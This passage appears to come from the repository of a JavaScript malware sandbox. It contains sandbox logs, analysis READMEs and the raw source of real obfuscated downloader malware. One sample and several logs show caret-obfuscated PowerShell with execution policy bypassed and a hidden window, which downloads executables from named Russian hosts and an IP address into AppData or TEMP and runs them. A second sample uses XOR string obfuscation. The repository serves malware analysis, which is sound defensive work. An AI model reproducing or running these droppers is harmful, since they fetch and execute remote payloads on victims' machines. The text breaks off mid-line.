125 | vname = name; 126 | util_log("Proxy.set: " + _truncateOutput(target.toString(), 50) + "[" + vname + "]"); 127 | } 128 | if (name in target) 129 | return Reflect.set(target, name, value); 130 | if (typeof name === 'string') { 131 | lcname = name.toLowerCase(); 132 | if (lcname in target) 133 | return Reflect.set(target, lcname, value); 134 | } 135 | return Reflect.set(target, name, value); 136 | }, 137 | construct: function(target, args, newTarget) { 138 | if (_proxy_options.verbose) { 139 | util_log("Proxy.construct: " + target + "(" + _truncateOutput(args.join(", "), 50) + ")"); 140 | } 141 | return _proxy(Reflect.construct(target, args, newTarget)); 142 | }, 143 | apply: function(target, that, args) { 144 | if (_proxy_options.verbose) { 145 | util_log("Proxy.apply: " + target + "(" + _truncateOutput(args.join(", "), 50) + ")"); 146 | } 147 | return Reflect.apply(target, that, args); 148 | } 149 | }) 150 | return ret; 151 | } 152 | _proxy.toString = () => { 153 | return "_proxy" 154 | } 155 | 156 | if (typeof module !== 'undefined') { 157 | var exports = module.exports = {}; 158 | exports._proxy = _proxy; 159 | exports._proxy_options = _proxy_options; 160 | exports._defineSingleProperty = _defineSingleProperty; 161 | var util_log = console.log; 162 | } 163 | // Strange, does not work in node 164 | //Date.toStringOrig = Date.prototype.toString; 165 | //// 166 | //Date.prototype.toString = function() { 167 | // // Node: Sat,Oct,22,2016,22:20:52,GMT+0200,(CEST) 168 | // // WSH: Sat,Oct,22,22:07:32,UTC+0200,2016 169 | // util_log("called") 170 | // var a = this.toStringOrig().split(" "); 171 | // var b = a.slice(3); 172 | // b[3] = a[4]; 173 | // b[4] = a[5]; 174 | // b[5] = a[3]; 175 | // return b.join(" "); 176 | // } 177 | // //Date.prototype.inspect = Date.prototype.toString; 178 | -------------------------------------------------------------------------------- /malware/20160531/8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.output: -------------------------------------------------------------------------------- 1 | 31 May 23:29:16 - Malware sandbox ver. 0.4 2 | 31 May 23:29:16 - ------------------------ 3 | 31 May 23:29:16 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js 4 | 31 May 23:29:16 - Malware files: malware/20160531/8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.js 5 | 31 May 23:29:16 - Output file for sandbox dump: sandbox_dump_after.json 6 | 31 May 23:29:16 - Output directory for generated files: output/ 7 | 31 May 23:29:16 - ==> Preparing Sandbox environment. 8 | 31 May 23:29:16 - => Executing: env/utils.js 9 | 31 May 23:29:16 - => Executing: env/eval.js 10 | 31 May 23:29:16 - Preparing sandbox to intercept eval() calls. 11 | 31 May 23:29:16 - => Executing: env/function.js 12 | 31 May 23:29:16 - Preparing sandbox to intercept 'new Function()' calls. 13 | 31 May 23:29:16 - => Executing: env/wscript.js 14 | 31 May 23:29:16 - Preparing sandbox to emulate WScript environment. 15 | 31 May 23:29:16 - => Executing: env/browser.js 16 | 31 May 23:29:16 - Preparing sandbox to emulate Browser environment (default = IE11). 17 | 31 May 23:29:16 - Created: window[1] 18 | 31 May 23:29:16 - document.createElement(body) 19 | 31 May 23:29:16 - Element[2] created with name: 'body' 20 | 31 May 23:29:16 - => Executing: env/agents.js 21 | 31 May 23:29:16 - Setting Browser environment to: IE8 on Win10 64bit 22 | 31 May 23:29:16 - => Executing: env/other.js 23 | 31 May 23:29:16 - ==> Executing malware file(s). 24 | 31 May 23:29:16 - => Executing: malware/20160531/8d1c45e37b97fcd061f52a5d7ab73476ab80520df58514eb7e091852d2d43b04.js 25 | 31 May 23:29:16 - Potentially contains continue within a catch 26 | 31 May 23:29:16 - Strict mode: false 27 | 31 May 23:29:16 - Calling eval() no.: 1 28 | 31 May 23:29:16 - WScript.CreateObject(WScript.Shell) 29 | 31 May 23:29:16 - Created: WScript.Shell[4] 30 | 31 May 23:29:16 - WScript.Shell[4].ExpandEnvironmentStrings(%TEMP%/) 31 | 31 May 23:29:16 - WScript.CreateObject(WinHttp.WinHttpRequest.5.1) 32 | 31 May 23:29:16 - Created: MSXML2.XMLHTTP[5] 33 | 31 May 23:29:16 - MSXML2.XMLHTTP[5].open(GET,http://204.232.192.84/9dojp,false) 34 | 31 May 23:29:16 - MSXML2.XMLHTTP[5].send(undefined) 35 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].onreadystatechange(), readyState = 4 length: 146948 status: 200 36 | 31 May 23:29:18 - MSXML2.XMLHTTP[5] statusText = null 37 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].responseBody = '?zqh_VMD;2) ?~ulcZQH?6-$?ypg^ULC:1(?} ... (truncated)' 38 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].status = '200' 39 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].onreadystatechange() undefined 40 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].send(undefined) finished 41 | 31 May 23:29:18 - WScript.CreateObject(ADODB.Stream) 42 | 31 May 23:29:18 - Created: ADODB_Stream[6] 43 | 31 May 23:29:18 - ADODB_Stream[6].Open() 44 | 31 May 23:29:18 - ADODB_Stream[6].type = '1' 45 | 31 May 23:29:18 - MSXML2.XMLHTTP[5].ResponseBody.get() 46 | 31 May 23:29:18 - ADODB_Stream[6].content = '?zqh_VMD;2) ?~ulcZQH?6-$?ypg^ULC:1(?} ... (truncated)' 47 | 31 May 23:29:18 - ADODB_Stream[6].Write(str) - 146948 bytes 48 | 31 May 23:29:18 - ADODB_Stream[6].size = '146948' 49 | 31 May 23:29:18 - ADODB_Stream[6].position = '0' 50 | 31 May 23:29:18 - ADODB_Stream[6].SaveToFile(%TEMP%/Hkf3vagihtHtFwa, 2) 51 | 31 May 23:29:18 - ADODB_Stream[6].content.get() 52 | 31 May 23:29:18 - ADODB_Stream[6].Close() 53 | 31 May 23:29:18 - WScript.CreateObject(ADODB.Stream) 54 | 31 May 23:29:18 - Created: ADODB_Stream[7] 55 | 31 May 23:29:18 - ADODB_Stream[7].type = '2' 56 | 31 May 23:29:18 - ADODB_Stream[7].Charset = '437' 57 | 31 May 23:29:18 - ADODB_Stream[7].Open() 58 | 31 May 23:29:18 - ADODB_Stream[7].type.get() 59 | 31 May 23:29:18 - ADODB_Stream[7].charset.get() 60 | 31 May 23:29:18 - ADODB_Stream[7].charset.get() 61 | 31 May 23:29:18 - ADODB_Stream[7].content = '?zqh_VMD;2) ?~ulcZQH?6-$?ypg^ULC:1(? ... (truncated)' 62 | 31 May 23:29:18 - ADODB_Stream[7].charset.get() 63 | 31 May 23:29:18 - ADODB_Stream[7].content.get() 64 | 31 May 23:29:18 - ADODB_Stream[7].LoadFromFile(%TEMP%/Hkf3vagihtHtFwa) 146948 bytes, encoding: 437 65 | 31 May 23:29:18 - ADODB_Stream[7].Position = '0' 66 | 31 May 23:29:18 - ADODB_Stream[7].ReadText.get() 67 | 31 May 23:29:18 - ADODB_Stream[7].Close() 68 | 31 May 23:29:18 - WScript.CreateObject(ADODB.Stream) 69 | 31 May 23:29:18 - Created: ADODB_Stream[8] 70 | 31 May 23:29:18 - ADODB_Stream[8].type = '2' 71 | 31 May 23:29:18 - ADODB_Stream[8].Charset = '437' 72 | 31 May 23:29:18 - ADODB_Stream[8].Open() 73 | 31 May 23:29:19 - ADODB_Stream[8].type.get() 74 | 31 May 23:29:19 - ADODB_Stream[8].charset.get() 75 | 31 May 23:29:19 - ADODB_Stream[8].charset.get() 76 | 31 May 23:29:19 - ADODB_Stream[8].content = 'MZ?@?!?L?!This program cannot be ... (truncated)' 77 | 31 May 23:29:19 - ADODB_Stream[8].charset.get() 78 | 31 May 23:29:19 - ADODB_Stream[8].WriteText(str) - 146944 bytes, encoding: 437 79 | 31 May 23:29:19 - ADODB_Stream[8].content.get() 80 | 31 May 23:29:19 - ADODB_Stream[8].size = '146944' 81 | 31 May 23:29:19 - ADODB_Stream[8].SaveToFile(%TEMP%/Hkf3vagihtHtFwa.exe, 2) 82 | 31 May 23:29:19 - ADODB_Stream[8].content.get() 83 | 31 May 23:29:19 - ADODB_Stream[8].Close() 84 | 31 May 23:29:19 - WScript.Shell[4].Run(%TEMP%/Hkf3vagihtHtFwa.exe 123, undefined, undefined) 85 | 31 May 23:29:19 - WScript.Quit(0) 86 | 31 May 23:29:19 - ==> Script execution finished, dumping sandbox environment to a file. 87 | 31 May 23:29:19 - MSXML2.XMLHTTP[5].ResponseBody.get() 88 | 31 May 23:29:21 - Saving: output/_TEMP__Hkf3vagihtHtFwa 89 | 31 May 23:29:21 - Saving: output/_TEMP__Hkf3vagihtHtFwa.exe 90 | 31 May 23:29:22 - Generated file saved 91 | 31 May 23:29:22 - Generated file saved 92 | 31 May 23:29:22 - The sandbox context has been saved to: sandbox_dump_after.json 93 | -------------------------------------------------------------------------------- /malware/20160531/README.md: -------------------------------------------------------------------------------- 1 | Analysis of https://malwr.com/analysis/ZTA4ZDk5MDNiN2VjNDk4ZDgwOTU4NDBmYTAxZDVmOWI/ 2 | -------------------------------------------------------------------------------- /malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.txt: -------------------------------------------------------------------------------- 1 | Malware as found here: 2 | https://malwr.com/analysis/NDU1ZDA4NmY3ZGUyNDczZjg0ODU2OGZiZTMxNjA5NzE/ 3 | -------------------------------------------------------------------------------- /malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out: -------------------------------------------------------------------------------- 1 | 30 Sep 01:02:11 - mailware-jail, a malware sandbox ver. 0.5 2 | 30 Sep 01:02:11 - ------------------------ 3 | 30 Sep 01:02:11 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 30 Sep 01:02:11 - Malware files: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js 5 | 30 Sep 01:02:11 - Output file for sandbox dump: sandbox_dump_after.json 6 | 30 Sep 01:02:11 - Output directory for generated files: output/ 7 | 30 Sep 01:02:11 - ==> Preparing Sandbox environment. 8 | 30 Sep 01:02:11 - => Executing: env/utils.js 9 | 30 Sep 01:02:11 - => Executing: env/eval.js 10 | 30 Sep 01:02:11 - Preparing sandbox to intercept eval() calls. 11 | 30 Sep 01:02:11 - => Executing: env/function.js 12 | 30 Sep 01:02:11 - Preparing sandbox to intercept 'new Function()' calls. 13 | 30 Sep 01:02:11 - => Executing: env/wscript.js 14 | 30 Sep 01:02:11 - Preparing sandbox to emulate WScript environment. 15 | 30 Sep 01:02:11 - => Executing: env/browser.js 16 | 30 Sep 01:02:11 - Preparing sandbox to emulate Browser environment (default = IE11). 17 | 30 Sep 01:02:11 - Created: window[1] 18 | 30 Sep 01:02:11 - Created: document[2] 19 | 30 Sep 01:02:11 - document[2].createElement(html) 20 | 30 Sep 01:02:11 - Element[3] created, named: 'html' 21 | 30 Sep 01:02:11 - document[2].createElement(body) 22 | 30 Sep 01:02:11 - Element[5] created, named: 'body' 23 | 30 Sep 01:02:11 - document[2].body = 'Element[5]' 24 | 30 Sep 01:02:11 - document[2].createElement(head) 25 | 30 Sep 01:02:11 - Element[7] created, named: 'head' 26 | 30 Sep 01:02:11 - Element[3].appendChild(Element[7]) 27 | 30 Sep 01:02:11 - Element[3].firstChild set 28 | 30 Sep 01:02:11 - document[2].body.get() => Element[5] 29 | 30 Sep 01:02:11 - Element[3].appendChild(Element[5]) 30 | 30 Sep 01:02:11 - => Executing: env/agents.js 31 | 30 Sep 01:02:11 - Setting Browser environment to: IE8 on Win10 64bit 32 | 30 Sep 01:02:11 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 30 Sep 01:02:11 - => Executing: env/other.js 34 | 30 Sep 01:02:11 - => Executing: env/console.js 35 | 30 Sep 01:02:11 - ==> Executing malware file(s). 36 | 30 Sep 01:02:11 - => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js 37 | 30 Sep 01:02:11 - Strict mode: false 38 | 30 Sep 01:02:11 - Calling eval() no.: 1 39 | 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell) 40 | 30 Sep 01:02:11 - Created: WScript.Shell[9] 41 | 30 Sep 01:02:11 - WScript.SpecialFolders(Desktop) 42 | 30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk) 43 | 30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk) 44 | 30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk 45 | 30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject) 46 | 30 Sep 01:02:11 - Scripting.FileSystemObject[11] created. 47 | 30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell) 48 | 30 Sep 01:02:11 - Created: WScript.Shell[12] 49 | 30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP) 50 | 30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13] 51 | 30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream) 52 | 30 Sep 01:02:11 - Created: ADODB_Stream[14] 53 | 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/ 54 | 30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15] 55 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0) 56 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true 57 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false' 58 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false 59 | 30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined) 60 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200 61 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null 62 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)' 63 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200' 64 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined 65 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished 66 | 30 Sep 01:02:15 - ADODB_Stream[14].type = '1' 67 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated) 68 | 30 Sep 01:02:15 - ADODB_Stream[14].Open() 69 | 30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)' 70 | 30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes 71 | 30 Sep 01:02:15 - ADODB_Stream[14].size = '196608' 72 | 30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined) 73 | 30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... (truncated) 74 | 30 Sep 01:02:15 - ADODB_Stream[14].Close() 75 | 30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined) 76 | 30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js) 77 | 30 Sep 01:02:15 - ==> Cleaning up sandbox. 78 | 30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file. 79 | 30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated) 80 | 30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15] 81 | 30 Sep 01:02:16 - Generated file saved 82 | 30 Sep 01:02:16 - The sandbox context has been saved to: sandbox_dump_after.json 83 | -------------------------------------------------------------------------------- /malware/20161001/README.md: -------------------------------------------------------------------------------- 1 | ## N750991284.js ## 2 | 3 | https://malwr.com/analysis/MzdlYThhNGE0NTZkNGRiMjg4MmE0ZTFmZjMyNTQyYzg/ 4 | => f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.js 5 | 6 | Analyze with: 7 | 8 | node jailme.js --down=y malware/20161001/f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.js > malware/20161001/f51943c5860e548138991b991abecaa175353c80ab3ea91b3d1fbb5a4feb42f4.out 9 | 10 | ## Wileen.js ## 11 | 12 | https://malwr.com/analysis/NTVkZDQ4MGZkZWE4NDAyM2EwODEyMDM3MDhjMDI1MTQ/ 13 | => a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js 14 | 15 | Analyze with: 16 | 17 | node jailme.js --down=y -c ./config_wscript_only.json malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js > malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out 18 | 19 | ## ORDER-19586.js ## 20 | 21 | https://malwr.com/analysis/YmQ1Y2M1YjAxNGY0NGRlNjllODI4N2Y0MGYzYmI3ZGM/ 22 | => cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.js 23 | 24 | This one has very long and nice deobfuscation. 25 | 26 | Analyze with: 27 | 28 | node jailme.js --down=y malware/20161001/cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.js >malware/20161001/cfb2d04891156bffb08ad15188f9dbbd9e7379b0a571fd50128116904873e238.out 29 | -------------------------------------------------------------------------------- /malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js: -------------------------------------------------------------------------------- 1 | var izacvabno = 'u/js/boxu'; 2 | var vocbalfysf = 0; 3 | var dbuwof = 'n4.bin'; 4 | 5 | function ugyvujgy() { 6 | return "edating.r"; 7 | } 8 | var ezvirqeqvan = "agy"; 9 | 10 | function blyzoxmi() { 11 | var uxlyrdulec = 'ick.doubl'; 12 | return uxlyrdulec; 13 | } 14 | function huzuf() { 15 | return null; 16 | } 17 | function ovxyz() { 18 | var droxhesj = blyzoxmi() + ugyvujgy() + izacvabno + dbuwof; 19 | return droxhesj; 20 | } 21 | var kgebdi = undefined; 22 | 23 | function ivixemy() { 24 | var gjanixi = false; 25 | return gjanixi; 26 | } 27 | if (ivixemy() === false) { 28 | var yrpez = 39.5145; 29 | if (typeof document == "undefined") { 30 | var rinipa = new ActiveXObject("WScRipT.SHEll"); 31 | switch (kgebdi) { 32 | case null: 33 | var wlerlubm = 1; 34 | if (wlerlubm === 1) { 35 | var ebukem = typeof null; 36 | var anwudomild = undefined; 37 | var cojuwpusi = typeof true; 38 | var ovhexreqde = typeof 7.7; 39 | var hpivytr = typeof 'ussizrehe'; 40 | } 41 | break; 42 | case "21747": 43 | var wlerlubm = 1; 44 | if (wlerlubm === 1) { 45 | var ebukem = typeof null; 46 | var anwudomild = undefined; 47 | var cojuwpusi = typeof true; 48 | var ovhexreqde = typeof 7.7; 49 | var hpivytr = typeof 'ussizrehe'; 50 | } 51 | break; 52 | case "83059": 53 | var wlerlubm = 1; 54 | if (wlerlubm === 1) { 55 | var ebukem = typeof null; 56 | var anwudomild = undefined; 57 | var cojuwpusi = typeof true; 58 | var ovhexreqde = typeof 7.7; 59 | var hpivytr = typeof 'ussizrehe'; 60 | } 61 | break; 62 | case "19773": 63 | var wlerlubm = 1; 64 | if (wlerlubm === 1) { 65 | var ebukem = typeof null; 66 | var anwudomild = undefined; 67 | var cojuwpusi = typeof true; 68 | var ovhexreqde = typeof 7.7; 69 | var hpivytr = typeof 'ussizrehe'; 70 | } 71 | break; 72 | case undefined: 73 | rinipa.run("cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'" + "http://cl" + ovxyz() + "','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe'", false); 74 | var yhqisunlyrj = typeof null; 75 | var iwvantart = 8; 76 | iwvantart = "ijaneset" + iwvantart; 77 | var pyvifkaqgi = '16479' + 27; 78 | var dxatdims = "bucmiknitdi"; 79 | break; 80 | } 81 | } else { 82 | if (typeof vocbalfysf == 'boolean') { 83 | var egelqo = null; 84 | yvytaq = 'ylsaft' + 914; 85 | var twatolab = 9.03; 86 | var loxanjofu = twatolab + ezvirqeqvan; 87 | loxanjofu = "amxokcug" + loxanjofu; 88 | exgapfokdo = 10 + 'bniwtu'; 89 | ovryhludnam = 24.1754 + "40107"; 90 | var acsybytuk = 6.8702 + 'utozqu'; 91 | var libymnojb = typeof 20; 92 | } 93 | } 94 | } else { 95 | if (huzuf() == null) { 96 | var ohinxe = 'ecilmasc'; 97 | var tamambi = null; 98 | var elrydxiqta = typeof null; 99 | } 100 | } 101 | -------------------------------------------------------------------------------- /malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out: -------------------------------------------------------------------------------- 1 | 1 Oct 13:05:34 - mailware-jail, a malware sandbox ver. 0.6 2 | 1 Oct 13:05:34 - ------------------------ 3 | 1 Oct 13:05:34 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/other.js,env/console.js 4 | 1 Oct 13:05:34 - Malware files: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js 5 | 1 Oct 13:05:34 - Output file for sandbox dump: sandbox_dump_after.json 6 | 1 Oct 13:05:34 - Output directory for generated files: output/ 7 | 1 Oct 13:05:34 - ==> Preparing Sandbox environment. 8 | 1 Oct 13:05:34 - => Executing: env/utils.js 9 | 1 Oct 13:05:34 - => Executing: env/eval.js 10 | 1 Oct 13:05:34 - Preparing sandbox to intercept eval() calls. 11 | 1 Oct 13:05:34 - => Executing: env/function.js 12 | 1 Oct 13:05:34 - Preparing sandbox to intercept 'new Function()' calls. 13 | 1 Oct 13:05:34 - => Executing: env/wscript.js 14 | 1 Oct 13:05:34 - Preparing sandbox to emulate WScript environment. 15 | 1 Oct 13:05:34 - => Executing: env/other.js 16 | 1 Oct 13:05:34 - => Executing: env/console.js 17 | 1 Oct 13:05:34 - ==> Executing malware file(s). 18 | 1 Oct 13:05:34 - => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js 19 | 1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll) 20 | 1 Oct 13:05:34 - Created: WScript.Shell[1] 21 | 1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe', false, undefined) 22 | 1 Oct 13:05:34 - ==> Cleaning up sandbox. 23 | 1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file. 24 | 1 Oct 13:05:34 - The sandbox context has been saved to: sandbox_dump_after.json 25 | -------------------------------------------------------------------------------- /malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js: -------------------------------------------------------------------------------- 1 | NLWNAGICE(); 2 | 3 | function HTNHCX(GESRUAS) { 4 | 5 | FLFCXUV = parseInt(GESRUAS); 6 | return FLFCXUV; 7 | }; 8 | 9 | function SODXEPKEN(ZCBAHVYOL, GWQCZKRS) { 10 | 11 | DQDIXG = ZCBAHVYOL ^ GWQCZKRS; 12 | 13 | return DQDIXG; 14 | }; 15 | 16 | function HWSELX(RJSGZJN, XHZGH) { 17 | // util_log("HWSELX(" + RJSGZJN + ", " + XHZGH+")"); 18 | 19 | ICKSVUEAO = '0'; 20 | XPMFUE = 'x'; 21 | LMQYPS = ICKSVUEAO + XPMFUE; 22 | ZDJKDKZK = ''; 23 | 24 | FNWVPY = 61 - 58; 25 | QFGCST = 't'; 26 | ENYZLWYO = 'n'; 27 | LBVAC = 'i'; 28 | YOZENUDBO = 'g'; 29 | LNSCLQTC = 'o'; 30 | RUGKXKZUZ = 't'; 31 | GVGEPZOG = 'r'; 32 | KUGNOK = 'S'; 33 | IYCPSYFWX = QFGCST + LNSCLQTC + KUGNOK + RUGKXKZUZ + GVGEPZOG + LBVAC + ENYZLWYO + YOZENUDBO; 34 | 35 | KEDQH = RJSGZJN[IYCPSYFWX](); 36 | 37 | QSVXSXTEF = 'o'; 38 | JZJNXPBYH = 'h'; 39 | CFGINE = 'd'; 40 | DHWNQMC = 'a'; 41 | BXRVZYNTP = 'r'; 42 | AISMTUX = 'C'; 43 | RQAMQZ = 'm'; 44 | AUCPVRV = 'e'; 45 | UJXJUAZ = 'o'; 46 | XVNPQOG = 'f'; 47 | UTRTET = 'r'; 48 | HJWBAPJLC = 'C'; 49 | 50 | NSOSZH = XVNPQOG + UTRTET + QSVXSXTEF + RQAMQZ + AISMTUX + JZJNXPBYH + DHWNQMC + BXRVZYNTP + HJWBAPJLC + UJXJUAZ + CFGINE + AUCPVRV; 51 | MXECAU = 't'; 52 | CKZIO = 's'; 53 | NVFZAOFB = 'b'; 54 | CWFTSPJ = 's'; 55 | KNZKIGW = 'r'; 56 | HQOEB = 'u'; 57 | CNFTMW = CKZIO + HQOEB + NVFZAOFB + CWFTSPJ + MXECAU + KNZKIGW; 58 | 59 | DLJUV = 'g'; 60 | VBCOI = 'n'; 61 | HKNUST = 'h'; 62 | AKNXJ = 't'; 63 | YETVW = 'l'; 64 | ENBPLEBRX = 'e'; 65 | 66 | FCLEFW = KEDQH[YETVW + ENBPLEBRX + VBCOI + DLJUV + AKNXJ + HKNUST]; 67 | 68 | for (var VEHIT = 0; VEHIT < FCLEFW; VEHIT += FNWVPY) { 69 | 70 | GMOLGWSA = LMQYPS; 71 | GMOLGWSA = GMOLGWSA + KEDQH[CNFTMW](VEHIT, 2); 72 | DHARERH = HTNHCX(GMOLGWSA); 73 | // util_log("aa:"+DHARERH); 74 | NPNSIMEK = SODXEPKEN(DHARERH, XHZGH); 75 | ZDJKDKZK = ZDJKDKZK + String[NSOSZH](NPNSIMEK); 76 | }; 77 | util_log("HWSELX(" + RJSGZJN + ", " + XHZGH+") => " + ZDJKDKZK); 78 | 79 | return ZDJKDKZK; 80 | }; 81 | 82 | function NLWNAGICE() { 83 | GXZMINO = false; 84 | SBRSRGIOQ = 113 - 110; 85 | KHZAZI = 'J'; 86 | OLNRBHZ = 'X'; 87 | SIZXIWJH = 'G'; 88 | WURGFNQ = 'E'; 89 | APFXKBUM = 'L'; 90 | 91 | AEOCOF = OLNRBHZ + APFXKBUM + WURGFNQ + KHZAZI + SIZXIWJH; 92 | 93 | try { 94 | GXZMINO = JXSEL(AEOCOF); 95 | } catch (Y) { 96 | 97 | WJZLSZQUO = 'm'; 98 | DMRDRQDZ = 'n'; 99 | YUDKNE = 'a'; 100 | CHFLAYM = 'e'; 101 | 102 | QGSBA = 'e'; 103 | WBYWXK = 'r'; 104 | VLMWRPHQ = 't'; 105 | NPDOS = 'A'; 106 | NVMHXEJCN = 'd'; 107 | MERNQAK = 'C'; 108 | XNBSPEJUP = 'o'; 109 | QPZBKFTR = 'c'; 110 | VAWUM = 'h'; 111 | QDRXPLSZU = 'a'; 112 | 113 | util_log("a: " + Y + " b: " + DMRDRQDZ + YUDKNE + WJZLSZQUO + CHFLAYM + " c: " + QPZBKFTR + VAWUM + QDRXPLSZU + WBYWXK + MERNQAK + XNBSPEJUP + NVMHXEJCN + QGSBA + NPDOS + VLMWRPHQ + " d: " + SBRSRGIOQ); 114 | XHZGH = Y[DMRDRQDZ + YUDKNE + WJZLSZQUO + CHFLAYM][QPZBKFTR + VAWUM + QDRXPLSZU + WBYWXK + MERNQAK + XNBSPEJUP + NVMHXEJCN + QGSBA + NPDOS + VLMWRPHQ](SBRSRGIOQ); 115 | }; 116 | if (!GXZMINO) { 117 | util_log("XHZGH " + XHZGH); 118 | XHZGH = XHZGH + 110; 119 | //for (var i = 0; i < 256 ; i+=1) { 120 | // Hynek: Very strange: had to increase by 2 to properly deobfuscate 121 | XHZGH = XHZGH + 2 ;//i; 122 | // Hynek: end 123 | LDSATLTI = HWSELX("82Z86UB6HA7ABCSA5LA1FFBY86UBDNB0HB9BB9X", XHZGH); 124 | util_log("LDSATLTI: " + _truncateOutput(LDSATLTI) + " XHZGH: " + XHZGH + " charcode: " + (XHZGH - 110)); 125 | //} 126 | util_log("LDSATLTI " + LDSATLTI); 127 | DYDUHJGS = JXSEL(LDSATLTI); 128 | 129 | QUOELSUF = JXSEL(HWSELX("86XB6UA7QBCJA5EA1YBCSBBMB2FFBZ93TBCMB9FB0Y86SACLA6GA1AB0TB8O9AJB7CBFYB0SB6MA1H", XHZGH)); 130 | util_log("DYDUHJGS: " + DYDUHJGS + "[" + HWSELX("B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D", XHZGH) + "](" + 